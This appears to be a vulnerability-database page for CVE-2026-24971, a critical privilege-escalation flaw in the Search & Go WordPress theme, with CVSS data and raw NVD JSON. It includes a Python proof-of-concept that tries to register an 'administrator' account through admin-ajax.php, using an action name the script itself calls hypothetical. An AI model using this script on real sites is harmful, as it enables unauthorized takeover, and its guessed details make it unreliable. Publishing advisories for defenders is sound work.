Security Vulnerability Report
中文
CVE-2026-24971 CVSS 9.8 CRITICAL

CVE-2026-24971

Published: 2026-03-25 17:16:39
Last Modified: 2026-04-24 16:32:54

Description

Incorrect Privilege Assignment vulnerability in Elated-Themes Search & Go searchgo allows Privilege Escalation.This issue affects Search & Go: from n/a through <= 2.8.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Elated-Themes Search & Go <= 2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_privilege_escalation(target_url): """ PoC for CVE-2026-24971: Incorrect Privilege Assignment in Search & Go Theme. This script attempts to register a new user with administrative privileges. """ # Target endpoint (example, actual endpoint may vary based on theme implementation) endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload attempting to escalate privileges payload = { "action": "searchgo_theme_register_action", # Hypothetical action name "username": "attacker", "email": "[email protected]", "role": "administrator", # Malicious parameter injection "security": "nonce_value_if_needed" } try: response = requests.post(endpoint, data=payload) if response.status_code == 200: print("[+] Request sent successfully. Check if user was created as admin.") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" exploit_privilege_escalation(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24971", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:39.083", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in Elated-Themes Search & Go searchgo allows Privilege Escalation.This issue affects Search & Go: from n/a through <= 2.8."}, {"lang": "es", "value": "Vulnerabilidad de Asignación de Privilegios Incorrecta en Elated-Themes Search &amp; Go searchgo permite la escalada de privilegios. Este problema afecta a Search &amp; Go: desde n/a hasta &lt;= 2.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/searchgo/vulnerability/wordpress-search-go-theme-2-8-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}